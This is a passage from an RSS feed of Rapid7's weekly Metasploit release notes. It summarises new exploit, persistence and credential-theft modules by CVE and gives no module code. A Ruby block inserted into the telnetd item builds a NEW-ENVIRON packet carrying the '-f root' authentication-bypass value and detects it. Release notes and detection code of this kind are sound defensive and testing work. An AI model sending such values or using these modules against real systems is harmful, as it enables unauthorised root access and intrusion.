<h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with <span data-type='inlineCode'>msfupdate</span> and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><p><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-19T09%3A16%3A01Z..2026-02-26T16%3A14%3A35%2B01%3A00%22">Pull Requests 6.4.115...6.4.116</a></p></li><li><p><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.115...6.4.116">Full diff 6.4.115...6.4.116</a></p></li></ul><p>If you are a <span data-type='inlineCode'>git</span> user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-02-27-2026</link>
      <guid isPermaLink="false">blt25d73849a65132a8</guid>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Jacquie Harris]]></dc:creator>
      <pubDate>Fri, 27 Feb 2026 20:25:50 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7464fe659cab8a01/6852c358419e54d8e21c3458/blog-metasploit-wrap-up-.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 02/20/2026]]></title>
      <description><![CDATA[<h2>Hacking Churches and Backdooring Emacs</h2><p>This release packs some solid exploit module additions! Two new unauthenticated RCE modules are a major win: the <strong>StoryChief WordPress plugin exploit</strong> (CVE-2025-7441) targets a webhook validation flaw that allows arbitrary file uploads, while the <strong>ChurchCRM exploit</strong> (CVE-2025-62521) abuses the installation wizard to inject PHP code for persistent access. Both establish Meterpreter sessions. On the persistence front, there's a creative <strong>Emacs extension module</strong> that plants malicious Lisp code for shell callbacks whenever Emacs launches; a fun take on an unconventional attack surface. Alongside Emacs there is a new Windows persistence module that uses the good old registry, this time the Userinit value, to get Administrator shells whenever any user logs in. To wrap up, you can now spread automation nightmares with the new n8n auxiliary module, which extracts the sessions of other logged-in users (admins included).</p><h2>New module content (5)</h2><h3>n8n arbitrary file read</h3><p>Authors: dor attias and msutovsky-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20856">#20856</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a></p><p>Path: gather/ni8mare_cve_2026_21858</p><p>Description: This adds an auxiliary module for n8n. 
The vulnerability, known as Ni8mare, allows arbitrary file read and the extraction of other users' sessions, enabling privilege escalation within the web application.</p><h3>Emacs Extension Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20919">#20919</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/persistence/emacs_extension</p><p>Description: This adds a persistence module for Emacs on Linux; the planted Emacs extension opens a session as the compromised user whenever Emacs starts.</p><h3>ChurchCRM Unauthenticated RCE 6.8.0</h3><p>Author: LucasCsmt</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20947">#20947</a> contributed by <a href="https://github.com/LucasCsmt">LucasCsmt</a></p><p>Path: multi/http/churchcrm_install_unauth_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-62521&amp;referrer=blog">CVE-2025-62521</a></p><p>Description: This PR adds a new exploit module for CVE-2025-62521, an unauthenticated Remote Code Execution (RCE) vulnerability in ChurchCRM versions 6.8.0 and earlier.</p><h3>WordPress StoryChief Plugin Unauthenticated RCE</h3><p>Authors: Nayera and xpl0dec</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20976">#20976</a> contributed by <a href="https://github.com/Nayeraneru">Nayeraneru</a></p><p>Path: multi/http/wp_plugin_story_chef_file_upload</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-7441&amp;referrer=blog">CVE-2025-7441</a></p><p>Description: Adds a new exploit module targeting CVE-2025-7441, an unauthenticated RCE in the WordPress StoryChief plugin, versions &lt;= 1.0.45.</p><h3>Windows Registry Persistence via Userinit</h3><p>Authors: h00die and joel</p><p>Type: Exploit</p><p>Pull request: <a 
href="https://github.com/rapid7/metasploit-framework/pull/20844">#20844</a> contributed by <a href="https://github.com/6a6f656c">6a6f656c</a></p><p>Path: windows/persistence/registry_userinit</p><p>Description: This adds a persistence module for Windows. Using the Userinit registry value, the target machine opens a session with Administrator privileges every time any user logs in.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20807">#20807</a> from <a href="https://github.com/webbsssss">webbsssss</a> - Allows Acunetix vulnerabilities to be imported without complete web page data.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20969">#20969</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates Metasploit's logic for importing Acunetix XML files to also include items below High severity.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20972">#20972</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes false positives in the LG Simple Editor modules' check methods.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-13T12%3A01%3A15Z..2026-02-19T09%3A16%3A01Z%22">Pull Requests 6.4.114...6.4.115</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.114...6.4.115">Full diff 6.4.114...6.4.115</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-02-20-2026</link>
      <guid isPermaLink="false">blt21980e3b5eeb06e4</guid>
      <category><![CDATA[Metasploit]]></category>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category><dc:creator><![CDATA[Diego Ledda]]></dc:creator>
      <pubDate>Fri, 20 Feb 2026 22:00:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0475760a2990dfd7/6849ab41a770d7563190a3ea/metasploit-fence.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 02/13/2026]]></title>
      <description><![CDATA[<h2>SolarWinds Web Help Desk</h2><p>Our very own <a href="https://github.com/sfewer-r7">sfewer-r7</a> has developed an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551. On successful exploitation the session runs as NT AUTHORITY\SYSTEM. For more information see Rapid7's <a href="https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/">SolarWinds Web Help Desk vulnerabilities guidance</a>.</p><h2>Contributions</h2><p>A big thanks to our contributors who have been adding some great content this release. <a href="https://github.com/rudraditya21">rudraditya21</a> has added MITRE ATT&CK metadata to many of our existing modules. <a href="https://github.com/Chocapikk">Chocapikk</a> has added support for GHSA (GitHub Security Advisory) references in Metasploit modules. <a href="https://github.com/rudraditya21">rudraditya21</a> also added negative caching to the LDAP entry cache, so missing objects are now recorded as well: the change introduces a missing-entry sentinel, tracks misses per identifier type, and updates the AD lookup helpers to short-circuit on cached misses and to record a miss when a lookup returns no entry.</p><h2>New module content (5)</h2><h3>FreeBSD rtsold/rtsol DNSSL Command Injection</h3><p>Authors: Kevin Day and Lukas Johannes Möller</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20798">#20798</a> contributed by <a href="https://github.com/JohannesLks">JohannesLks</a></p><p>Path: freebsd/misc/rtsold_dnssl_cmdinject</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-14558&amp;referrer=blog">CVE-2025-14558</a></p><p>Description: This adds a new command-injection exploit for the FreeBSD rtsol/rtsold daemons (CVE-2025-14558). 
The vulnerability is triggered through the Domain Name Search List (DNSSL) option of IPv6 Router Advertisement (RA) messages, which is passed to the resolvconf script without sanitization. The module requires elevated privileges because it needs to send crafted IPv6 RA packets. The injected commands are executed as root.</p><h3>Ivanti Endpoint Manager Mobile (EPMM) unauthenticated RCE</h3><p>Authors: sfewer-r7 and watchTowr</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20932">#20932</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: linux/http/ivanti_epmm_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-1340&amp;referrer=blog">CVE-2026-1340</a></p><p>Description: Adds an exploit module for the recent command injection vulnerability, CVE-2026-1281, affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron. It was exploited in the wild as a zero-day by an unknown threat actor.</p><h3>GNU Inetutils Telnet Authentication Bypass Exploit CVE-2026-24061</h3><p>Authors: Kyu Neushwaistein and jheysel-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20929">#20929</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: linux/telnet/gnu_inetutils_auth_bypass</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-24061&amp;referrer=blog">CVE-2026-24061</a></p><p>Description: This adds an exploit module for the authentication bypass in GNU Inetutils telnetd tracked as CVE-2026-24061. 
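</p><p>The bypass rides on the telnet NEW-ENVIRON option (RFC 1572), the subnegotiation a client uses to hand environment variables such as USER to the server before login runs; the sentence that follows describes the value that triggers it. As an added example (not the module's code and not GNU Inetutils' code), the Ruby below encodes and decodes a NEW-ENVIRON IS subnegotiation and flags a USER value that starts with '-', which is the shape a log or IDS pipeline should alert on. The constants come from RFC 854 and RFC 1572; the sample variables are constructed for the example.</p>

```ruby
# Added example, not GNU Inetutils' or the Metasploit module's code: a minimal
# encoder/decoder for the telnet NEW-ENVIRON option (RFC 1572), the channel a
# client uses to hand variables such as USER to telnetd, plus the check a log or
# IDS pipeline would apply to the decoded USER value. Constants are from RFC 854
# and RFC 1572; the sample variables below are constructed.

IAC = 255                 # telnet: Interpret As Command
SB = 250                  # telnet: SubNegotiation Begin
SE = 240                  # telnet: SubNegotiation End
NEW_ENVIRON = 39          # option code
ENV_IS = 0                # subnegotiation commands sent by the client
ENV_INFO = 2
ENV_VAR = 0               # type codes inside the subnegotiation
ENV_VALUE = 1
ENV_ESC = 2
ENV_USERVAR = 3

# Bytes that collide with the type codes are prefixed with ESC; a literal IAC
# is doubled, as everywhere in telnet.
def env_escape(str)
  str.bytes.flat_map do |b|
    case b
    when ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR then [ENV_ESC, b]
    when IAC then [IAC, IAC]
    else [b]
    end
  end
end

# Client -> server "IS" reply carrying the given variables.
def build_new_environ_is(vars)
  body = vars.flat_map { |name, value| [ENV_VAR] + env_escape(name) + [ENV_VALUE] + env_escape(value) }
  ([IAC, SB, NEW_ENVIRON, ENV_IS] + body + [IAC, SE]).pack('C*')
end

# Server side: decode an IS/INFO subnegotiation into { name => value }.
# Returns nil for anything that is not a well-formed NEW-ENVIRON reply.
def parse_new_environ(data)
  b = data.bytes
  return nil unless b[0, 3] == [IAC, SB, NEW_ENVIRON] && [ENV_IS, ENV_INFO].include?(b[3])
  return nil unless b.length >= 6 && b[-2, 2] == [IAC, SE]
  vars = {}
  name = value = sink = nil
  i = 4
  while i < b.length - 2               # stop before the trailing IAC SE
    c = b[i]
    case c
    when ENV_VAR, ENV_USERVAR          # start of a new variable name
      vars[name.pack('C*')] = (value || []).pack('C*') if name
      name = []
      value = nil
      sink = name
      i += 1
    when ENV_VALUE                     # switch from the name to its value
      return nil if name.nil?
      value = []
      sink = value
      i += 1
    else                               # ordinary byte, "ESC x", or "IAC IAC"
      return nil if sink.nil?
      if c == ENV_ESC || c == IAC
        return nil if i + 1 >= b.length - 2
        sink << b[i + 1]
        i += 2
      else
        sink << c
        i += 1
      end
    end
  end
  vars[name.pack('C*')] = (value || []).pack('C*') if name
  vars
end

# A login name never legitimately starts with '-'. A value such as "-f root" is
# the shape of the CVE-2026-24061 trigger: handed on to login(1), it is read as
# login's own "-f" (pre-authenticated) option instead of as a user name.
def suspicious_user?(vars)
  user = vars && vars['USER']
  !user.nil? && user.start_with?('-')
end

if __FILE__ == $PROGRAM_NAME
  benign = build_new_environ_is('USER' => 'alice', 'TERM' => 'xterm')
  attack = build_new_environ_is('USER' => '-f root')
  [benign, attack].each do |pkt|
    vars = parse_new_environ(pkt)
    puts "#{pkt.unpack1('H*')} -> #{vars.inspect} suspicious=#{suspicious_user?(vars)}"
  end
end
```

<p>The parser returns nil for anything that is not a well-formed reply rather than guessing, so a truncated or hostile subnegotiation cannot leave a half-built variable behind, and the check itself is deliberately narrow (a leading '-') because no legitimate account name begins with an option character.</p><p>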
During negotiation, if the USER environment variable is passed in with a value of "-f root", authentication is bypassed, resulting in command execution as the root user.</p><h3>SolarWinds Web Help Desk unauthenticated RCE</h3><p>Authors: Jimi Sebree and sfewer-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20917">#20917</a> contributed by <a href="https://github.com/sfewer-r7">sfewer-r7</a></p><p>Path: multi/http/solarwinds_webhelpdesk_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-40551&amp;referrer=blog">CVE-2025-40551</a></p><p>Description: This adds an exploit module for SolarWinds Web Help Desk installations vulnerable to CVE-2025-40536 and CVE-2025-40551. Successful exploitation opens a session as NT AUTHORITY\SYSTEM or root, depending on the target platform.</p><h3>Xerte Online Toolkits Arbitrary File Upload - Upload Image</h3><p>Author: Brandon Lester</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20849">#20849</a> contributed by <a href="https://github.com/haicenhacks">haicenhacks</a></p><p>Path: multi/http/xerte_authenticated_rce_uploadimage</p><p>Description: This adds three RCE modules for Xerte Online Toolkits, affecting versions 3.14.0 and &lt;= 3.13.7. Two are unauthenticated, while this one is authenticated.</p><h2>Enhancements and features (10)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20710">#20710</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - Adds support for GHSA (GitHub Security Advisory) and OSV (Open Source Vulnerabilities) references in Metasploit modules.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20886">#20886</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Updates services so that they can also have child services. This allows for more detailed reporting in the services and vulns commands, which can now report parent -&gt; child services, e.g. 
SSL -&gt; HTTPS.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20895">#20895</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds negative caching to the LDAP entry cache so missing objects are recorded and subsequent lookups by DN, sAMAccountName, or SID return nil without re-querying the directory.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20934">#20934</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&CK tags to modules related to LDAP and AD CS. This enables users to find this content using Metasploit's search functionality and the att&ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20935">#20935</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds the MITRE ATT&CK tag T1558.003 to the kerberoast modules. This enables users to find this content using Metasploit's search functionality and the att&ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20936">#20936</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&CK tags to SMB modules related to accounts. This enables users to find the content by using Metasploit's search capability and the att&ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20937">#20937</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This adds MITRE ATT&CK tags to the two existing SCCM modules that fetch NAA credentials using different techniques. 
This enables users to find this content using Metasploit's search functionality and the att&ck keyword.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20941">#20941</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds a MITRE ATT&CK technique reference to the Windows password cracking module to support ATT&CK-driven discovery.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20942">#20942</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Adds MITRE ATT&CK technique references to the getsystem, cve_2020_1472_zerologon, and atlassian_confluence_rce_cve_2023_22527 modules to support ATT&CK-driven discovery.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20943">#20943</a> from <a href="https://github.com/g0tmi1k">g0tmi1k</a> - Adds the affected versions to the description of the exploits/unix/webapp/twiki_maketext module.</li></ul><h2>Bugs fixed (7)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20599">#20599</a> from <a href="https://github.com/BenoitDePaoli">BenoitDePaoli</a> - Fixes an issue where running services -p &lt;ports&gt; -u -R to set RHOSTS from database values could fail silently with a file-not-found error.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20775">#20775</a> from <a href="https://github.com/rmtsixq">rmtsixq</a> - Fixes a database initialization failure when using msfdb init with the --connection-string option to connect to PostgreSQL 15+ instances (e.g., Docker containers).</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20817">#20817</a> from <a href="https://github.com/randomstr1ng">randomstr1ng</a> - Fixes the output of sap_router_portscanner so that it no longer crashes the module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20903">#20903</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Fixes an issue so 
#enum_user_directories no longer returns duplicate directories.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20906">#20906</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - Implements a fix for SSH command shells dying on cmd_exec when a trailing newline was present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20953">#20953</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Improves the stability of socket channeling support for SSH sessions opened via scanner/ssh/ssh_login.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20955">#20955</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Ensures the cleanup of temporarily created RHOST files when using the services -p &lt;ports&gt; -u -R command to set RHOST values from the database.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-04T14%3A20%3A14-05%3A00..2026-02-13T12%3A01%3A15Z%22">Pull Requests 6.4.112...6.4.114</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.112...6.4.114">Full diff 6.4.112...6.4.114</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-02-13-2026</link>
      <guid isPermaLink="false">bltd52ddb5762440d22</guid>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Christopher Granleese]]></dc:creator>
      <pubDate>Fri, 13 Feb 2026 20:01:55 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0d50271a40a5f14f/6849ab419621d9f3824d5017/metasploit-sky.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 02/06/2026]]></title>
      <description><![CDATA[<h2>Google Summer of Code 2026</h2><p>Our very own Jack Heysel has added some <a href="https://github.com/rapid7/metasploit-framework/pull/20910">documentation</a> which outlines the Metasploit Framework project ideas for GSoC 2026. Anyone interested in applying should see the <a href="https://github.com/rapid7/metasploit-framework/blob/master/docs/metasploit-framework.wiki/How-to-Apply-to-GSoC.md">GSoC How-To-Apply</a> documentation, or reach out to any of the following GSoC mentors on the <a href="https://metasploit.slack.com/">Metasploit Slack</a>:</p><ul><li>@jheysel</li><li>@zeroSteiner</li><li>@h00die</li></ul><h2>Gladinet</h2><p>This week <a href="https://github.com/Chocapikk">Chocapikk</a> has added Gladinet CentreStack/Triofox exploitation capabilities: two new auxiliary modules and an update to an existing exploit. The updated exploit module now accepts a custom <span data-type='inlineCode'>MACHINEKEY</span> option to leverage newly discovered vulnerabilities that allow the extraction of machineKeys from Web.config files. 
The <span data-type='inlineCode'>gladinet_storage_path_traversal_cve_2025_11371</span> module exploits path traversal to read arbitrary files and extract machineKeys, while <span data-type='inlineCode'>gladinet_storage_access_ticket_forge</span> forges access tickets using hardcoded cryptographic keys.</p><h2>New module content (1)</h2><h3>Gladinet CentreStack/Triofox Access Ticket Forge</h3><p>Authors: Huntress Team, Julien Voisin, and Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20768">#20768</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a> </p><p>Path: <span data-type='inlineCode'>gather/gladinet_storage_access_ticket_forge</span></p><p></p><p>Description: This adds two auxiliary modules for Gladinet CentreStack/Triofox. Both modules can read arbitrary files and extract the machineKey, which is used to secure ASP.NET ViewState data. Furthermore, this change also includes a new mixin for Gladinet.</p><h2>Enhancements and features (3)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20739">#20739</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - This adds MITRE ATT&CK metadata tags to modules relating to Kerberos and unconstrained delegation. 
This enables users to search for the content based on the ATT&CK technique ID.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20882">#20882</a> from <a href="https://github.com/karanabe">karanabe</a> - Adds the <span data-type='inlineCode'>RSAKeySize</span> advanced option and uses it when generating the CSR key pair, allowing users to increase key size to meet certificate template minimums and avoid <span data-type='inlineCode'>CERTSRV_E_KEY_LENGTH</span> errors when 2048-bit keys are rejected.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20883">#20883</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - Updates Kerberos modules to present a user friendly message when the user specifies the <span data-type='inlineCode'>IMPERSONATE</span> option when running a module but also forgets to specify <span data-type='inlineCode'>IMPERSONATION_TYPE</span>.</li></ul><h2>Bugs fixed (5)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20368">#20368</a> from <a href="https://github.com/isaac-app-dev">isaac-app-dev</a> - Fixes an issue that caused msfvenom to break if it were run from alternative directories.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20680">#20680</a> from <a href="https://github.com/cdelafuente-r7">cdelafuente-r7</a> - Improves the RPC API with multiple fixes and enhancements.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20834">#20834</a> from <a href="https://github.com/kuklycs">kuklycs</a> - This fixes the NoMethodError in the team_viewer post module, caused by misuse of the <span data-type='inlineCode'>each_key</span> method. 
The <span data-type='inlineCode'>keys</span> array has been updated to a 1-D array to simplify the logic.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20916">#20916</a> from <a href="https://github.com/Chepycou">Chepycou</a> - Fixes a crash when running the SAP modules <span data-type='inlineCode'>sap_soap_rfc_system_info</span> or <span data-type='inlineCode'>sap_icf_public_info</span>.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20920">#20920</a> from <a href="https://github.com/rudraditya21">rudraditya21</a> - This fixes a bug in password cracking modules where the <span data-type='inlineCode'>auto</span> action would crash even when the path to a compatible executable was specified in <span data-type='inlineCode'>CRACKER_PATH</span>.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20910">#20910</a> from <a href="https://github.com/jheysel-r7">jheysel-r7</a> - This adds documentation regarding the projects for which we are soliciting submissions for as part of the Google Summer of Code program.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-01-29T15%3A38%3A16Z..2026-02-04T14%3A20%3A14-05%3A00%22">Pull Requests 6.4.111...6.4.112</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.111...6.4.112">Full diff 6.4.111...6.4.112</a></li></ul><p>If you are a <span data-type='inlineCode'>git</span> user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. 
To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-02-06-2026</link>
      <guid isPermaLink="false">blt819b76c909c21d56</guid>
      <category><![CDATA[Metasploit Weekly Wrapup]]></category>
      <category><![CDATA[Metasploit]]></category><dc:creator><![CDATA[Christopher Granleese]]></dc:creator>
      <pubDate>Fri, 06 Feb 2026 18:52:32 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt17a0f47d4a54c137/683ddb248ac17c544429ac06/metasploit-ascii-1.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Metasploit Wrap-Up 01/30/2026]]></title>
      <description><![CDATA[<h2>FreePBX Content Galore</h2><p>This week brings three new pieces of module content targeting FreePBX. All three chain multiple vulnerabilities together, starting with CVE-2025-66039. This initial vulnerability allows unauthenticated users to bypass the authentication process and interact with FreePBX. From there, the different modules leverage either a SQL injection vulnerability (CVE-2025-61675) or a file upload vulnerability (CVE-2025-61678) to obtain remote code execution.</p><h2>New module content (7)</h2><h3>FreePBX endpoint SQLi to RCE</h3><p>Authors: Noah King and msutovsky-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20857">#20857</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a></p><p>Path: unix/http/freepbx_custom_extension_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61675&amp;referrer=blog">CVE-2025-61675</a></p><p>Description: This adds an exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with a SQLi, CVE-2025-61675, to add a cron job to the cron_job table of the database, resulting in remote code execution.</p><h3>FreePBX firmware file upload</h3><p>Authors: Noah King and msutovsky-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20858">#20858</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a></p><p>Path: unix/http/freepbx_firmware_file_upload</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61678&amp;referrer=blog">CVE-2025-61678</a></p><p>Description: This adds an exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with an unrestricted file upload via the firmware upload, CVE-2025-61678, to place a webshell on the web server, resulting in remote code execution.</p><h3>FreePBX Custom Extension SQL Injection</h3><p>Authors: Noah King and 
msutovsky-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20846">#20846</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a></p><p>Path: gather/freepbx_custom_extension_injection</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-61675&amp;referrer=blog">CVE-2025-61675</a></p><p>Description: This adds an auxiliary module for FreePBX which chains an authentication bypass (CVE-2025-66039) with a SQLi (CVE-2025-61675) to create an admin user in the database.</p><h3>Cacti Graph Template authenticated RCE versions prior to 1.2.29</h3><p>Authors: Jack Heysel and chutchut</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20799">#20799</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: multi/http/cacti_graph_template_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-24367&amp;referrer=blog">CVE-2025-24367</a></p><p>Description: This adds an exploit for CVE-2025-24367, an authenticated RCE in Cacti versions prior to 1.2.29.</p><h3>SmarterTools SmarterMail GUID File Upload Vulnerability</h3><p>Authors: Piotr Bazydlo, Sina Kheirkhah, and jheysel-r7</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20866">#20866</a> contributed by <a href="https://github.com/jheysel-r7">jheysel-r7</a></p><p>Path: multi/http/smartermail_guid_file_upload</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-52691&amp;referrer=blog">CVE-2025-52691</a></p><p>Description: This adds a module for the unauthenticated file upload in SmarterTools SmarterMail (CVE-2025-52691). The vulnerability 